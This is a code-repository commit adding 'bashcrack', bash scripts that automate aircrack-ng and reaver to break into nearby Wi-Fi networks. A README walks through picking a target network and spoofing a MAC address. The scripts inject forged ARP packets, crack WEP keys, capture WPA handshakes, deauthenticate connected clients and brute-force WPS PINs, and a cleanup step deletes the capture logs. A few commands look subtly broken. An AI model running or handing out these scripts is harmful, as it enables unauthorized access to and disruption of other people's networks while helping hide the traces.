Commit 4577710e authored by Derrick Sobodash's avatar Derrick Sobodash

Initial commit from Mercurial repo.

parent b5e89b12
Copyright (c) 2011, Derrick Sobodash
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
bashcrack
=========
Follow the following flow order:
1. Run 'init' to set up the system.
2. Run 'scan' to get a list of nearby WEP points. You can only crack one that
has some amount of data traffic.
3. Run 'target' and pass the BSSID, ESSID and CHANNEL of the target network
as the only paramters. For example:
./target 00:11:DE:AD:BE:EF pagefault 6
The script will echo your input back. Make sure it is valid.
4. Run 'capture' to begin collecting traffic. This script will test to make
sure your wireless device supports injection. If this step fails, your only
hope is to wait for enough traffic to pass on its own.
5. Select a method of attack:
a. Run 'flood/arp' to attempt to catch a packet from the air and hurl it
back at the ARP. It may not work.
b. Try to engineer your own forged packet. To do this, you can try to run
either 'attack/fragmentation' or 'attack/chopchop'. One of these should
create a file with a name like 'fragment*.xor'. After this file has been
created, forge a packet using 'attack/forgepacket'. You can inject this
fake packet back into the ARP with 'flood/xor'.
6. When 20,000 data packets have been collected, try running 'crack'. If there
are not enough packets to break the protection, just wait. Crack will try
again every 5,000 new packets.
7. Jot down your password and run 'cleanup' to purge all the logs and reset
your wireless device.
The files in 'cfg' control basic settings. These assume your wireless device
is wlan0 and you are using the default 'network-manager' tool.
If you are using wicd, edit './cfg/manager' and replace 'network-manager'
with 'wicd'.
If your network device is anything other than wlan0, edit './cfg/wireless'
and replace 'wlan0' with the correct name of your device.
bashcrack
=========
Shell scripts to abstract the nitty gritty of aircrack-ng and reaver
\ No newline at end of file
# Wireless device to use
WLAN="wlan0"
# Second wireless device, if available
WLAN2=
# Wireless manager
# (this is most likely either 'network-manager' or 'wicd')
MANAGER="network-manager"
# Fake hardware address to use
FAKE_HOST="00:11:22:33:44:55"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
echo "Purging crack logs..."
rm /tmp/airodump* >>/dev/null 2>&1
rm ./cfg/target.conf >>/dev/null 2>&1
rm /tmp/fake-arp >>/dev/null 2>&1
rm ./wep/attack/*.cap >>/dev/null 2>&1
rm ./wep/attack/*.xor >>/dev/null 2>&1
rm ./wep/flood/*.cap >>/dev/null 2>&1
rm /tmp/psk*.cap >>/dev/null 2>&1
echo "Switching wireless mode to managed..."
ifconfig $WLAN down
macchanger --permanent $WLAN
iwconfig $WLAN mode managed
ifconfig $WLAN -promisc
#ifconfig $WLAN -allmulti
ifconfig $WLAN multicast
ifconfig $WLAN trailers
ifconfig $WLAN up
iwconfig $WLAN channel auto
if [ "$WLAN2" != "" ]; then
ifconfig $WLAN2 down
iwconfig $WLAN2 mode managed
ifconfig $WLAN2 -promisc
ifconfig $WLAN2 multicast
ifconfig $WLAN2 trailers
ifconfig $WLAN2 up
iwconfig $WLAN2 channel auto
fi
echo "Attempting to restart network managers..."
service $MANAGER start
service avahi-daemon start
echo "Done!"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
#PERM_HOST=`ifconfig | grep eth0 | awk '{print $5}'`
echo "Shutting down network manager..."
service $MANAGER stop
service avahi-daemon stop
killall -15 wpa_supplicant
echo "Faking MAC address (00:11:22:33:44:55)..."
ifconfig $WLAN down
macchanger --mac $FAKE_HOST $WLAN
echo "Setting up promiscuous mode..."
iwconfig $WLAN mode monitor
ifconfig $WLAN up
if [ "$WLAN2" != "" ]; then
ifconfig $WLAN2 down
iwconfig $WLAN2 mode monitor
ifconfig $WLAN2 up
fi
echo "Done!"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
if [ "$1" == "--wep" ]; then
airodump-ng -t WEP $WLAN
elif [ "$1" == "--wpa" ]; then
airodump-ng -t WPA -t WPA2 $WLAN
elif [ "$1" == "--help" ]; then
echo "Options:"
echo "--wep - Show only WEP access points"
echo "--wpa - Show only WPA access points"
echo "--all - Show all access points (default)"
else
airodump-ng $WLAN
fi
#!/bin/bash
if [ "$3" == "" ]; then
echo "Options:"
echo "[bssid] [essid] [channel] - All three parameters are required"
exit 1
fi
echo "BSSID=\"$1\"" >> ./cfg/target.conf
echo "ESSID=\"$2\"" >> ./cfg/target.conf
echo "CHANNEL=\"$3\"" >> ./cfg/target.conf
. ./cfg/target.conf
echo "Your target network is:"
echo " bssid: $BSSID"
echo " essid: $ESSID"
echo " channel: $CHANNEL"
echo "Does this look right?"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
if [ "$WLAN2" != "" ]; then
echo "Testing injection using wlan to wlan..."
echo "Injecting from $WLAN..."
aireplay-ng -9 -i $WLAN2 $WLAN
echo ""
echo "Injecting from $WLAN2..."
aireplay-ng -9 -i $WLAN $WLAN2
else
echo "Testing injection using wlan to arp..."
aireplay-ng -9 $WLAN
fi
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "This attack grabs a data packet and passes it back. When successful, it will generate"
echo "a fragment*.xor file in this folder."
aireplay-ng -4 -b $BSSID -h $FAKE_HOST $WLAN
echo ""
echo "Now you should run forgepacket to use the new xor file to make an ARP packet!"
#!/bin/bash
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
DESTIP=255.255.255.255
SRCIP=255.255.255.255
echo "Attempting to forge a packet and store it to /tmp/fake-arp..."
packetforge-ng -0 -a $BSSID -h $FAKE_HOST -k $DESTIP -l $SRCIP -y `ls $PWD | grep '.xor'` -w /tmp/fake-arp
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "This attack grabs a data packet and passes it back. When successful, it will generate"
echo "a fragment*.xor file in this folder."
aireplay-ng -5 -b $BSSID -h $FAKE_HOST $WLAN
echo ""
echo "Now you should run forgepacket to use the new xor file to make an ARP packet!"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
echo "Looping auth requests..."
aireplay-ng -1 600 -o 1 -q 10 -e $ESSID -a $BSSID - $FAKE_HOST $WLAN
# Can try removing -1 6000 if it fails
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "Error: This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
echo "Testing whether we can inject into the ARP..."
TEST=`aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKE_HOST $WLAN | grep "Association successful"`
# Can try removing -o 1 if it fails
if [ "${TEST}" != "" ]; then
echo "Successful!"
echo "Beginning packet capture."
airodump-ng -c $CHANNEL -w /tmp/airodump --bssid $BSSID $WLAN
else
echo "Failed to associate."
echo "Aborting capture."
fi
#!/bin/bash
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
aircrack-ng -b $BSSID /tmp/airodump*.cap
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "We will now try to capture an ARP request. This may take a while on some networks."
echo "The injection attack will begin once we intercept a request."
aireplay-ng -3 -b $BSSID -h $FAKE_HOST $WLAN
#aireplay-ng -1 6000 -o1 -q 12 -e $ESSID -a $BSSID -h $FAKE_HOST $WLAN
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "We will now start sending our fake packet to the ARP."
echo "Watch your capture logs. Traffic should begin immediately."
aireplay-ng -2 -r /tmp/fake-arp $WLAN
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
. ../cfg/hardware.conf
airodump-ng -c $CHANNEL --bssid $BSSID -w /tmp/psk $WLAN
#!/bin/bash
if [ -f $1 ] && [ "$1" != "" ]; then
airolib-ng $2 --import cowpatty $1
else
echo "Options:"
echo "[wordlist] [database] - Path to password list and database target"
exit 1
fi
#!/bin/bash
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
if [ -f $1 ] && [ "$1" != "" ]; then
airodump-ng -w $1 -b $BSSID psk*.cap
else
echo "Options:"
echo "[filename] - Path to password list or hash database"
exit 1
fi
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
if [ "$1" == "--client" ]; then
echo "Sending DEAUTH request to $2 on $ESSID..."
aireplay-ng -0 3 -a $BSSID -c $2 $WLAN
else
echo "Options:"
echo "--client [xx:xx:xx:xx:xx:xx] - MAC address of client to bump"
fi
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
DELAY=0
if [ "$1" == "--help" ]; then
echo "Options:"
echo "--delay # - Specify delay between pin attempts"
elif [ "$1" == "--delay" ]; then
DELAY=$2
fi
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
#reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d $DELAY -f -a
reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d 0 -f -a
# Is -E needed?
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment